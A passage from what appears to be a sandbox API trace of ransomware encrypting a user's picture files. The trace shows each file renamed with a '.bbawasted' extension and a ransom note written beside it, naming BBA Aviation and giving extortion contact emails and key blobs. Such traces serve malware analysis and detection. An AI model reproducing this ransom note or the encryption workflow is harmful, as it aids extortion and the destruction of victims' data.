KEY:\r\n[begin_key]MAnpl/Crty4kOqATra0YNbfk2TIsyXzpvoEVksnMyei8s2laHUisv4bTh7tQaFpL\r\nB94jMd37VFeSkuYbIQTsVKTY8b+q8o64UMoioc3RpCScOc6IIFq6erPYIJ3jS9iu\r\nmOpsxWAIPTcvcFvaXRw3SmMa2EuqKyO5ISVK0MXW6etzWFyLeArYUlQtY7Micsv1\r\n+QFIpb15iFA8/c9nn24n/F+ASR/X6QXIc4jfFamqHq3s7zhrxp0cpHmrvB9LdvyF\r\ncs9vD4GGtmV3CiD+NrkPSVnAgUlZvuQmqgtt2ai1lS9GniQKzr/m0dBFfdXiPGhr\r\nRN14m1n99tdIr3kBOmurVKVqbCdMlEDlVplRXyGYrRELOEDmJb06vS1atuGNsOx5\r\nM5+TQ3Qqyz9Mj9gKUpZvRdkwsGewTKB7O0l2EW7yPIGQ/I0kvB1CrnowRbIfgNdv\r\n+2JUnB7+IghN8QczxwWNZHy8K6tsLlp3BouKkfYWMQtx83tnR+IEI28xOiI2Hax9\r\nTrksZrS3xBgS25nlx42MYMrHpZJxQVQWK/gJvqsxHGIJVqiGTeuryRkx9vkOpc2D\r\n9D//boBrXN5NhsJWQY6G3IFkD6XN9YJaW75bgTd92KTvE/4IwXZVt1K2qlpnVvHc\r\nuFEB40e2wtHtvc22fm1uY646g/xqLo8AQ7/mhHOIowW=[end_key]\r\nKEEP IT\r\n") returned 984 [0225.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0225.003] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0225.003] SetEndOfFile (hFile=0x28c) returned 1 [0225.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0225.006] CloseHandle (hObject=0x28c) returned 1 [0225.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0225.007] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6af250 | out: hHeap=0x660000) returned 1 [0225.007] _aulldvrm () returned 0x0 [0225.007] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a5e88) returned 1 [0225.008] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0225.008] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0225.008] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\mul-HdkVZb.bmp") returned 49 [0225.008] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26c) returned 0x6a1f58 [0225.008] lstrcpyW (in: lpString1=0x6a1fba, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0225.008] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0225.008] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6240) returned 1 [0225.009] CryptGenRandom (in: hProv=0x6a6240, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0225.009] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0225.009] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\mul-HdkVZb.bmp.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\mul-hdkvzb.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0225.010] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0225.011] SetEndOfFile (hFile=0x28c) returned 1 [0225.012] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0225.012] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0225.012] lstrcpyW (in: lpString1=0x6a1fba, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0225.012] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\mul-HdkVZb.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\mul-hdkvzb.bmp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\mul-HdkVZb.bmp.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\mul-hdkvzb.bmp.bbawasted")) returned 1 [0225.013] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\mul-HdkVZb.bmp.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\mul-hdkvzb.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0225.013] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0225.013] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x6499 [0225.013] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6499) returned 0x5f0000 [0225.013] CloseHandle (hObject=0x294) returned 1 [0225.015] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0225.016] CloseHandle (hObject=0x27c) returned 1 [0225.016] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0225.016] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6240) returned 1 [0225.017] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0225.017] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0225.017] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6240) returned 1 [0225.017] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0225.018] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0225.028] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0225.028] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0225.028] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0225.028] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]LxZDXpxk5v0sIL5RL1v3r1gyOS2BATLW91TV9v4lQLNoMCErB06QeQLOQKSXua84\r\n/LPx6Tqy3WIiJevvFApldFRP2/R+FiST2m9RsyuIH9od8TL1Z5Bl4q9rv5kdi88Y\r\nxEFEJMTibgEfILu/9TMu2WViESQrkN+ZxFgjEwpaZoexKWOQIOltmozFCuRqFFfH\r\nUQJpfFGqUsT0zU6uETB6D2KE1mwqrfim71ZNJ/qCAJRfKgsW6EIXsDs886ytTgpY\r\nSr8eOQ0xxOEhCu0csYZeG9bmuqSGO0HtnKIo/93k1JZbxuM55jlFXc11CevNHh0t\r\nXjhrvplQLodensnWbxoEYwL3dHOOgDkF6xZN6XbzZPEtvcTVr5ZrMTUCnSfJMh0Y\r\nLBIttIqkxXN/Z6RQbO/XaJDqNjwCvbj1VRjBfEM00xNWEonA/LyNHnWhHNeMh+3Y\r\nU79+G5Zf1Gwr41r8plEQu6rqN/tWrnZeycgHXmEICf3dYhtJ7TOSNCHHj06S2wy9\r\nAu7LEp6P/N+NaBPWgQjRXW2h8hl2TGqGFEA5z3wFwLkP80PmIZR/UVKSmxrVNJ/N\r\nPnfrnzfoofCEpBed7fHhEvsI2oCzeKfXcg//AI4KxINZjgjRgqgucqftp2/BNgEd\r\nJoF7DjAezUVhJfoCKOfPlI3cfvdRRoN0SSpKOJPWxI3=[end_key]\r\nKEEP IT\r\n") returned 984 [0225.028] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0225.029] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0225.029] SetEndOfFile (hFile=0x28c) returned 1 [0225.032] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0225.032] CloseHandle (hObject=0x28c) returned 1 [0225.032] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1f58 | out: hHeap=0x660000) returned 1 [0225.032] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b1e70 | out: hHeap=0x660000) returned 1 [0225.032] _aulldvrm () returned 0x0 [0225.032] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a65f8) returned 1 [0225.033] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0225.033] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0225.033] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\Q5D8Heyo0p2TPpS8Z.png") returned 56 [0225.033] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6c4b88 [0225.033] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0225.033] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0225.033] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6240) returned 1 [0225.034] CryptGenRandom (in: hProv=0x6a6240, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0225.034] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0225.034] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\Q5D8Heyo0p2TPpS8Z.png.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\q5d8heyo0p2tpps8z.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0225.035] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0225.036] SetEndOfFile (hFile=0x28c) returned 1 [0225.036] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0225.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0225.036] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0225.037] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\Q5D8Heyo0p2TPpS8Z.png" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\q5d8heyo0p2tpps8z.png"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\Q5D8Heyo0p2TPpS8Z.png.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\q5d8heyo0p2tpps8z.png.bbawasted")) returned 1 [0225.037] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\Q5D8Heyo0p2TPpS8Z.png.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\q5d8heyo0p2tpps8z.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0225.038] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0225.038] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x1668e [0225.038] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1668e) returned 0x5f0000 [0225.038] CloseHandle (hObject=0x27c) returned 1 [0225.042] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0225.043] CloseHandle (hObject=0x294) returned 1 [0225.043] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0225.043] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a61b8) returned 1 [0225.044] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0225.044] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0225.044] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a65f8) returned 1 [0225.045] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0225.045] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0225.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0225.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0225.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0225.244] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]fvKXRzZ4ngi6iJVW9ZXGZbCPJaCxbCOyEhHHlJiD/xTH5MGNWZW45dpE+VSeIaVl\r\nOsjxLw0PJa+hLwhdOeGSI4X2u8VqtkcobXffVuw+oGZ7GSpaT2d2WC6RLaboeP75\r\nbamomPM6q2AweoIcMd2BQg5wsiKFXNlClP4MnSF3raRnsY3VjozwZOns0ZsIIpif\r\n1oYoBUnnUXs7UeRqhVkKM2a/0ziTinD3Z7Xbw8q+ONHSJP2TTgzrGCYxo2S9T5Tk\r\nW5tqlBdBzDofFP+XwcsV7HoXZebI8mJ4hgeYs2A9S7vl7tPdqc8CiAdHFEUlvXjL\r\nB4xLWXoqiE8C/QYi9F5l1MGzKe8NuYeDgwUPFYDdbBoMmSyBfb/FLy4sHLDtnrGN\r\n7TZg2FusnzVddZIsKsW+Fp5DYa1CLG83qfUtWfbhUtAbbBVublmScui65dKcBiOS\r\n3exNgQi26objdjKkLo5Nf+jhJwZ3gHkBdRoiE2xrksLH+G0tNlNc2vjR9TGPbMfa\r\n91rrxHCKRyqxHIXRn3l1EF4Tu3IgNr+UZeOfRYT9YVPG5MVSjUQGXd/R1oEIZXzU\r\nvRcHrZ245zPeYkWjvkhvbIHBs3D4ENeYvAF65s9sVvrUqfrRqkYK8966riVVDcAi\r\nCUouYgHJf1SdJ66vVHZULtCz63RZnxzDZ23w8jzDfzX=[end_key]\r\nKEEP IT\r\n") returned 984 [0225.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0225.244] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0225.244] SetEndOfFile (hFile=0x28c) returned 1 [0225.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0225.247] CloseHandle (hObject=0x28c) returned 1 [0225.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0225.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa8b8 | out: hHeap=0x660000) returned 1 [0225.248] _aulldvrm () returned 0x0 [0225.248] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6350) returned 1 [0225.249] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0225.249] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0225.249] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\vaDhDyT.bmp") returned 46 [0225.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x266) returned 0x6bc8e0 [0225.249] lstrcpyW (in: lpString1=0x6bc93c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0225.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0225.249] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6240) returned 1 [0225.250] CryptGenRandom (in: hProv=0x6a6240, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0225.250] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0225.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\vaDhDyT.bmp.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\vadhdyt.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0225.251] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0225.252] SetEndOfFile (hFile=0x28c) returned 1 [0225.253] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0225.253] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0225.253] lstrcpyW (in: lpString1=0x6bc93c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0225.253] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\vaDhDyT.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\vadhdyt.bmp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\vaDhDyT.bmp.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\vadhdyt.bmp.bbawasted")) returned 1 [0225.254] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\vaDhDyT.bmp.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\vadhdyt.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0225.254] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0225.254] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x461b [0225.255] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x461b) returned 0x5f0000 [0225.255] CloseHandle (hObject=0x294) returned 1 [0225.256] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0225.256] CloseHandle (hObject=0x27c) returned 1 [0225.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0225.256] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6680) returned 1 [0225.257] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0225.257] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0225.257] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6bd0) returned 1 [0225.258] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0225.258] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0225.485] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0225.485] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0225.485] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0225.485] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]kroVX976fgRLFUNEOG5vhqIuMP5ax2YfiBphGTQVhX0vZX/FEktC5IuPDPXttLU5\r\ngO1gIWgKZlSV2xM5fsC4XyepOqv5wHqeKdGMWLgxE2R+q7kAFshKDwzF2DebvDEu\r\ny8TPu2LcvIa4xERQAJCy2bVqj47JS4pfOZWmcQcdp3hmz4oIpFSJlY85/l9D+jfo\r\nVEWGuqDhV1NJij4ue5yQZUbaGTuzrv80PUPFIIIT6cT5PqdTNDTWa/D/hRzpdV9g\r\nQX9Eno0BNyHjF/6dImOReO1nCgmsBEI36G8XnXiy6oKKm5I2uRqk2VYhzIjEIvbX\r\n5DAEaX1HcQwurFBhAkwF/jlMEYtZKeJxLgoZpdU6CJSQ3TiEj9TTJqIAgx7VDh0M\r\nV+Xc4wXZx2he8czn0qYbYGhxX+UKG8wvSFKl4WF+hpb4XVcg/+/hWUEv4qiWubEK\r\n8naSSFZs8/s3WU/oT975DMSn/tJxpyNXW6nOm0HI7n+TVTfNAxhQKQVjL0q9oDRW\r\nkyBLoXLI4HDRA/PKEkPgse90BWm1Qnv8CfEPuXc6Llw2dDWFsUPHz/YDpuRajaXl\r\nkwqbEKHwdEw/o3KetDLkICo1a6musakZ9pAg+Y6Ys+AV5PSR0dkly0qFPKwaK1SH\r\nId5WKvX6KaF6C06YiRGadpeUJ319vBwBqbQu3XpcPOd=[end_key]\r\nKEEP IT\r\n") returned 984 [0225.485] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0225.485] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0225.486] SetEndOfFile (hFile=0x28c) returned 1 [0225.488] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0225.488] CloseHandle (hObject=0x28c) returned 1 [0225.489] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc8e0 | out: hHeap=0x660000) returned 1 [0225.489] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6afdd0 | out: hHeap=0x660000) returned 1 [0225.489] _aulldvrm () returned 0x0 [0225.489] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6708) returned 1 [0225.490] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x48, pbBuffer=0x147ff00 | 